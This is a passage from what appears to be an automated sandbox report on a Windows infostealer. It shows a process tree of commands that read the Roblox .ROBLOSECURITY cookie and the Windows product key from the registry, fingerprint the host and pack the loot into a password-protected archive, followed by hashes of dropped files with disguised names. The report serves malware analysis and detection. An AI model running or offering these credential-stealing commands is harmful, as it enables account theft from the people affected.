                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              5⤵
                                                PID:5032
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                              4⤵
                                                PID:4720
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4372
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                4⤵
                                                  PID:620
                                                  • C:\Windows\system32\getmac.exe
                                                    getmac
                                                    5⤵
                                                      PID:2132
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI7602\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\eSfZH.zip" *"
                                                    4⤵
                                                      PID:3296
                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI7602\rar.exe
                                                        C:\Users\Admin\AppData\Local\Temp\_MEI7602\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\eSfZH.zip" *
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:4016
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                      4⤵
                                                        PID:4764
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic os get Caption
                                                          5⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1992
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                        4⤵
                                                          PID:2640
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic computersystem get totalphysicalmemory
                                                            5⤵
                                                              PID:2996
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                            4⤵
                                                              PID:2716
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic csproduct get uuid
                                                                5⤵
                                                                  PID:4856
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                4⤵
                                                                  PID:3980
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                    5⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    PID:2648
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                  4⤵
                                                                    PID:3936
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic path win32_VideoController get name
                                                                      5⤵
                                                                      • Detects videocard installed
                                                                      PID:1724
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                    4⤵
                                                                      PID:1448
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                        5⤵
                                                                          PID:4548
                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                  1⤵
                                                                    PID:1664

                                                                  Network

                                                                  MITRE ATT&CK Enterprise v15

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    d85ba6ff808d9e5444a4b369f5bc2730

                                                                    SHA1

                                                                    31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                    SHA256

                                                                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                    SHA512

                                                                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Filesize

                                                                    944B

                                                                    MD5

                                                                    d28a889fd956d5cb3accfbaf1143eb6f

                                                                    SHA1

                                                                    157ba54b365341f8ff06707d996b3635da8446f7

                                                                    SHA256

                                                                    21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                    SHA512

                                                                    0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Filesize

                                                                    944B

                                                                    MD5

                                                                    6c47b3f4e68eebd47e9332eebfd2dd4e

                                                                    SHA1

                                                                    67f0b143336d7db7b281ed3de5e877fa87261834

                                                                    SHA256

                                                                    8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c

                                                                    SHA512

                                                                    0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    d6bd0ad9bce20525de47185ecad9ebb3

                                                                    SHA1

                                                                    6caa7e4132255b12f241c64442a11e5f5896c715

                                                                    SHA256

                                                                    6b14edb8ad6ea4f8c0235692c6b01cddc8f8a383d5cd70bdc0ed507fcbab80fa

                                                                    SHA512

                                                                    bce1183186815fcc05446f5e2f2cb35abca0eb5e10b285eec00b59fae4081bebf0404efdf31cfded4d6542c2ebfc8db57ccf66543b7fd8375243576bbfc99633

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    02f3c8ec958c34642dcb0966649a551f

                                                                    SHA1

                                                                    86fbd363a860f66daffb23b3a45b64c061698027

                                                                    SHA256

                                                                    38f7949fb8a121737c141a44d4324b2585923f9f9a31d35de6ef10854b09bd20

                                                                    SHA512

                                                                    0b41e3350578f4deb0072a872a863fc0ff4791b021edcc320c87d51b0e9d921b9a605446e828bb24fe994a1c9b4239eabfe1a97cf9280df915db33a1e0d46e0e

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Filesize

                                                                    944B

                                                                    MD5

                                                                    6d42b6da621e8df5674e26b799c8e2aa

                                                                    SHA1

                                                                    ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                    SHA256

                                                                    5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                    SHA512

                                                                    53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Filesize

                                                                    944B

                                                                    MD5

                                                                    34f595487e6bfd1d11c7de88ee50356a

                                                                    SHA1

                                                                    4caad088c15766cc0fa1f42009260e9a02f953bb

                                                                    SHA256

                                                                    0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

                                                                    SHA512

                                                                    10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

                                                                  • C:\Users\Admin\AppData\Local\Temp\1d5cpt5f\1d5cpt5f.dll

                                                                    Filesize

                                                                    4KB

                                                                    MD5

                                                                    be87091c67b9fcf08da45c8d0189c07f

                                                                    SHA1

                                                                    0139669f07c73d4f25b29868eb64120277b07241

                                                                    SHA256

                                                                    72c8f6edffd15ae234aa52e49fa5c65118a7238d7c8a88a5f4568ecf352f4c3f

                                                                    SHA512

                                                                    3030001e00bfb95f3b6c51127a7e3483919f7061b90884399672a7846d49a7318769f44622f15c2a6f4f583a6c6c95a7297d3e252d97b02f9c06a1363f1e1610

                                                                  • C:\Users\Admin\AppData\Local\Temp\RES7261.tmp

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    aa6a6532c1a8d4b0817a3074b4b0f171

                                                                    SHA1

                                                                    242592dab1052eb414bec3815f540e572bcb2d7b

                                                                    SHA256

                                                                    03fc22ef730068e52879bc3870c5fe142c967bf0ee78698b15ee7a5cd8b3646c

                                                                    SHA512

                                                                    993ef83a59d1acd829ba63c5140247cd59ebaf7c10fc5de83d5da69ddb94808243d23d0d7cff37187c8f7bd029718982aaec1ba032e24cd32d712bd31ad5ab9f

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\VCRUNTIME140.dll

                                                                    Filesize

                                                                    106KB

                                                                    MD5

                                                                    49c96cecda5c6c660a107d378fdfc3d4

                                                                    SHA1

                                                                    00149b7a66723e3f0310f139489fe172f818ca8e

                                                                    SHA256

                                                                    69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

                                                                    SHA512

                                                                    e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\_bz2.pyd

                                                                    Filesize

                                                                    48KB

                                                                    MD5

                                                                    c413931b63def8c71374d7826fbf3ab4

                                                                    SHA1

                                                                    8b93087be080734db3399dc415cc5c875de857e2

                                                                    SHA256

                                                                    17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293

                                                                    SHA512

                                                                    7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\_ctypes.pyd

                                                                    Filesize

                                                                    58KB

                                                                    MD5

                                                                    00f75daaa7f8a897f2a330e00fad78ac

                                                                    SHA1

                                                                    44aec43e5f8f1282989b14c4e3bd238c45d6e334

                                                                    SHA256

                                                                    9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f

                                                                    SHA512

                                                                    f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\_decimal.pyd

                                                                    Filesize

                                                                    106KB

                                                                    MD5

                                                                    e3fb8bf23d857b1eb860923ccc47baa5

                                                                    SHA1

                                                                    46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0

                                                                    SHA256

                                                                    7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3

                                                                    SHA512

                                                                    7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\_hashlib.pyd

                                                                    Filesize

                                                                    35KB

                                                                    MD5

                                                                    b227bf5d9fec25e2b36d416ccd943ca3

                                                                    SHA1

                                                                    4fae06f24a1b61e6594747ec934cbf06e7ec3773

                                                                    SHA256

                                                                    d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7

                                                                    SHA512

                                                                    c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\_lzma.pyd

                                                                    Filesize

                                                                    85KB

                                                                    MD5

                                                                    542eab18252d569c8abef7c58d303547

                                                                    SHA1

                                                                    05eff580466553f4687ae43acba8db3757c08151

                                                                    SHA256

                                                                    d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9

                                                                    SHA512

                                                                    b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\_queue.pyd

                                                                    Filesize

                                                                    25KB

                                                                    MD5

                                                                    347d6a8c2d48003301032546c140c145

                                                                    SHA1

                                                                    1a3eb60ad4f3da882a3fd1e4248662f21bd34193

                                                                    SHA256

                                                                    e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192

                                                                    SHA512

                                                                    b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\_socket.pyd

                                                                    Filesize

                                                                    43KB

                                                                    MD5

                                                                    1a34253aa7c77f9534561dc66ac5cf49

                                                                    SHA1

                                                                    fcd5e952f8038a16da6c3092183188d997e32fb9

                                                                    SHA256

                                                                    dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f

                                                                    SHA512

                                                                    ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\_sqlite3.pyd

                                                                    Filesize

                                                                    56KB

                                                                    MD5

                                                                    1a8fdc36f7138edcc84ee506c5ec9b92

                                                                    SHA1

                                                                    e5e2da357fe50a0927300e05c26a75267429db28

                                                                    SHA256

                                                                    8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882

                                                                    SHA512

                                                                    462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\_ssl.pyd

                                                                    Filesize

                                                                    65KB

                                                                    MD5

                                                                    f9cc7385b4617df1ddf030f594f37323

                                                                    SHA1

                                                                    ebceec12e43bee669f586919a928a1fd93e23a97

                                                                    SHA256

                                                                    b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6

                                                                    SHA512

                                                                    3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\base_library.zip

                                                                    Filesize

                                                                    1.4MB

                                                                    MD5

                                                                    32ede00817b1d74ce945dcd1e8505ad0

                                                                    SHA1

                                                                    51b5390db339feeed89bffca925896aff49c63fb

                                                                    SHA256

                                                                    4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a

                                                                    SHA512

                                                                    a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\libcrypto-3.dll

                                                                    Filesize

                                                                    1.6MB

                                                                    MD5

                                                                    78ebd9cb6709d939e4e0f2a6bbb80da9

                                                                    SHA1

                                                                    ea5d7307e781bc1fa0a2d098472e6ea639d87b73

                                                                    SHA256

                                                                    6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e

                                                                    SHA512

                                                                    b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\libffi-8.dll

                                                                    Filesize

                                                                    29KB

                                                                    MD5

                                                                    08b000c3d990bc018fcb91a1e175e06e

                                                                    SHA1

                                                                    bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                    SHA256

                                                                    135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                    SHA512

                                                                    8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\libssl-3.dll

                                                                    Filesize

                                                                    223KB

                                                                    MD5

                                                                    bf4a722ae2eae985bacc9d2117d90a6f

                                                                    SHA1

                                                                    3e29de32176d695d49c6b227ffd19b54abb521ef

                                                                    SHA256

                                                                    827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147

                                                                    SHA512

                                                                    dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\python311.dll

                                                                    Filesize

                                                                    1.6MB

                                                                    MD5

                                                                    5f6fd64ec2d7d73ae49c34dd12cedb23

                                                                    SHA1

                                                                    c6e0385a868f3153a6e8879527749db52dce4125

                                                                    SHA256

                                                                    ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967

                                                                    SHA512

                                                                    c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\rar.exe

                                                                    Filesize

                                                                    615KB

                                                                    MD5

                                                                    9c223575ae5b9544bc3d69ac6364f75e

                                                                    SHA1

                                                                    8a1cb5ee02c742e937febc57609ac312247ba386

                                                                    SHA256

                                                                    90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                    SHA512

                                                                    57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\rarreg.key

                                                                    Filesize

                                                                    456B

                                                                    MD5

                                                                    4531984cad7dacf24c086830068c4abe

                                                                    SHA1

                                                                    fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                    SHA256

                                                                    58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                    SHA512

                                                                    00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\select.pyd

                                                                    Filesize

                                                                    25KB

                                                                    MD5

                                                                    45d5a749e3cd3c2de26a855b582373f6

                                                                    SHA1

                                                                    90bb8ac4495f239c07ec2090b935628a320b31fc

                                                                    SHA256

                                                                    2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876

                                                                    SHA512

                                                                    c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\skoch.aes

                                                                    Filesize

                                                                    166KB

                                                                    MD5

                                                                    4a12426f7a61012341bf45cc60bb14a1

                                                                    SHA1

                                                                    79dd64fb71cb118fcf8120e4c80049e256a5e2aa

                                                                    SHA256

                                                                    534f036497ff7057bc823ec780a27ce0902c088cc5aa0025788e35f56402ae39

                                                                    SHA512

                                                                    f932e40b5dbd5d3a32fcd1634c58d4b4db2bc4e9778df0a2a9c843f1b69dbd9fdc0f65681ab7aa47c0460e2c5f21b15a33e5c0bf7bb3ef65d5a36d9ca5347fe7

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\sqlite3.dll

                                                                    Filesize

                                                                    622KB

                                                                    MD5

                                                                    dbc64142944210671cca9d449dab62e6

                                                                    SHA1

                                                                    a2a2098b04b1205ba221244be43b88d90688334c

                                                                    SHA256

                                                                    6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c

                                                                    SHA512

                                                                    3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI7602\unicodedata.pyd

                                                                    Filesize

                                                                    295KB

                                                                    MD5

                                                                    8c42fcc013a1820f82667188e77be22d

                                                                    SHA1

                                                                    fba7e4e0f86619aaf2868cedd72149e56a5a87d4

                                                                    SHA256

                                                                    0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2

                                                                    SHA512

                                                                    3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rutp4ayj.x2w.ps1

                                                                    Filesize

                                                                    60B

                                                                    MD5

                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                    SHA1

                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                    SHA256

                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                    SHA512

                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                  • C:\Users\Admin\AppData\Roaming\Edge updater.exe

                                                                    Filesize

                                                                    201KB

                                                                    MD5

                                                                    9c52bdedd1bcb1d07204b8a2a9620806

                                                                    SHA1

                                                                    1245edb5362446d78023a7b849d695f8fcc0b8b1

                                                                    SHA256

                                                                    1eb6fed362249f41df06d22ace113052903467a6784bef22d92baadbaf1757ba

                                                                    SHA512

                                                                    09b12af4db093d25d37e44d5c0bb3da8d33bed1c0132ca0191541d85a57f9b7d666b8d16b027775ed739e7914ac54a89bbdf79893633c153e87ffb5b68ab4f16

                                                                  • C:\Users\Admin\AppData\Roaming\WindowsServices.exe

                                                                    Filesize

                                                                    156KB

                                                                    MD5

                                                                    92bee3d72cf5439f413af90b41f00289

                                                                    SHA1

                                                                    a3b599fe2c96384612801386fb224809f6e89572

                                                                    SHA256

                                                                    4428374ab0e289ab21904397add7a6464ff41520e0e43f1639d69ee8bce754de

                                                                    SHA512

                                                                    6476bf0d9612b210f14fb65c8a4da1145d2ba02050e11feb9f28367990c8af6837f33e74e28c0a73bd897553771b24877bc2162ecfba07c0e6455921647282a7

                                                                  • C:\Users\Admin\AppData\Roaming\WindowsSvhost.exe

                                                                    Filesize

                                                                    7.4MB

                                                                    MD5

                                                                    35e91aa5ffee601f03243fb87f073d58

                                                                    SHA1

                                                                    a2f50ed6cd1e4e4991c55811b3bf059ae1c47a9c

                                                                    SHA256

                                                                    becff3215c0d263bc8dd108eedaa35435fbee858a17e477126a9870f7e903653

                                                                    SHA512

                                                                    b616b89ee2f171e4dd3bafa9c811dfaf8511bd2380a8461b65b88a999272e6fc0c5cc2ce4fca704fb6a21274d4d3c53a3e98bba0da1b90dbb84acfaa9dc8cd28

                                                                  • C:\Users\Admin\AppData\Roaming\update.exe

                                                                    Filesize

                                                                    348KB

                                                                    MD5

                                                                    6bc2b6f1b37435410d1e7cad10fba884

                                                                    SHA1

                                                                    6cf02a7443c037f5dd4e18884c5473c6d1213b67

                                                                    SHA256

                                                                    a61bce28bde41ff22a99bd50a3c29fc843d3f2a7d4447190742621241ce3f7d9

                                                                    SHA512

                                                                    5c3208c769ba35d3d993aa8d23d115a0984ef1a84d5d8438f59a975e7675eeebb511312a05e2b91f0a4ca7e092dc5c07653543abfc1d65bc1acc5cab0d4cd580

                                                                  • C:\Windows\System32\drivers\etc\hosts

                                                                    Filesize

                                                                    2KB

                                                                    MD5

                                                                    f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                    SHA1

                                                                    e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                    SHA256

                                                                    a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                    SHA512

                                                                    c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\1d5cpt5f\1d5cpt5f.0.cs

                                                                    Filesize

                                                                    1004B

                                                                    MD5

                                                                    c76055a0388b713a1eabe16130684dc3

                                                                    SHA1

                                                                    ee11e84cf41d8a43340f7102e17660072906c402

                                                                    SHA256

                                                                    8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                    SHA512

                                                                    22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\1d5cpt5f\1d5cpt5f.cmdline

                                                                    Filesize

                                                                    607B

                                                                    MD5

                                                                    f1b7c39de00efcc58f7fd97ba18f82a1

                                                                    SHA1

                                                                    ab088a87f08e4ed092e26515659351f8b562ff5b

                                                                    SHA256

                                                                    9be3eb440ea8e79f7216c1415ef2002731caf513fec28eed35b79a1495a28159

                                                                    SHA512

                                                                    f312c6a5635206b85159f0693482eb4f5190412aa494afc1dee8da0556e2ec9840f0602e837e343382be081a07cc811b38286560fd8158fc4ce24096d23b9e47

                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\1d5cpt5f\CSC617DC35BB5B467293921E3F311DA4E2.TMP

                                                                    Filesize

                                                                    652B

                                                                    MD5

                                                                    0d01924439bca790f31b50e7d24f5c6e

                                                                    SHA1

                                                                    54292f0f423ae9badba79fa0763a905d8a85cd2a

                                                                    SHA256

                                                                    9f6cb94acbaed7bb86d3011d0a414598f21c0b94b0e66e1b9d80cc27129c457e

                                                                    SHA512

                                                                    35184736fe84205cbe6a9a8cdc8ef24900652d67a85ca96e23fd610230e1bc47f8b3828dda98a96a27c972876ce97163987d5ae132fab6ec8474dc2abcdf8640

                                                                  • memory/756-126-0x0000000000B50000-0x0000000000B60000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/756-34-0x0000000000B50000-0x0000000000B60000-memory.dmp

                                                                    Filesize

                                                                    64KB

                                                                  • memory/1612-136-0x0000027AB8A00000-0x0000027AB8A22000-memory.dmp

                                                                    Filesize

                                                                    136KB

                                                                  • memory/3188-190-0x0000000006000000-0x000000000603C000-memory.dmp

                                                                    Filesize

                                                                    240KB

                                                                  • memory/3188-123-0x0000000004EA0000-0x0000000004F06000-memory.dmp

                                                                    Filesize

                                                                    408KB

                                                                  • memory/3188-43-0x0000000000350000-0x00000000003AE000-memory.dmp

                                                                    Filesize

                                                                    376KB

                                                                  • memory/3188-141-0x0000000005AC0000-0x0000000005AD2000-memory.dmp

                                                                    Filesize

                                                                    72KB

                                                                  • memory/3188-44-0x0000000005310000-0x00000000058B4000-memory.dmp

                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/3188-69-0x0000000004E00000-0x0000000004E92000-memory.dmp

                                                                    Filesize

                                                                    584KB

                                                                  • memory/3368-110-0x00007FFAFE050000-0x00007FFAFE073000-memory.dmp

                                                                    Filesize

                                                                    140KB

                                                                  • memory/3368-413-0x00007FFAFE5F0000-0x00007FFAFE609000-memory.dmp

                                                                    Filesize

                                                                    100KB

                                                                  • memory/3368-400-0x00007FFAFE030000-0x00007FFAFE049000-memory.dmp

                                                                    Filesize

                                                                    100KB

                                                                  • memory/3368-98-0x00007FFB02E50000-0x00007FFB02E73000-memory.dmp

                                                                    Filesize

                                                                    140KB

                                                                  • memory/3368-99-0x00007FFB07840000-0x00007FFB0784F000-memory.dmp

                                                                    Filesize

                                                                    60KB

                                                                  • memory/3368-189-0x00007FFB02E50000-0x00007FFB02E73000-memory.dmp

                                                                    Filesize

                                                                    140KB

                                                                  • memory/3368-76-0x00007FFAEB740000-0x00007FFAEBD29000-memory.dmp

                                                                    Filesize

                                                                    5.9MB

                                                                  • memory/3368-108-0x00007FFB02CF0000-0x00007FFB02D1D000-memory.dmp

                                                                    Filesize

                                                                    180KB

                                                                  • memory/3368-109-0x00007FFAFE5F0000-0x00007FFAFE609000-memory.dmp

                                                                    Filesize

                                                                    100KB

                                                                  • memory/3368-121-0x00007FFAEB0A0000-0x00007FFAEB5C0000-memory.dmp

                                                                    Filesize

                                                                    5.1MB

                                                                  • memory/3368-220-0x00007FFAFE050000-0x00007FFAFE073000-memory.dmp

                                                                    Filesize
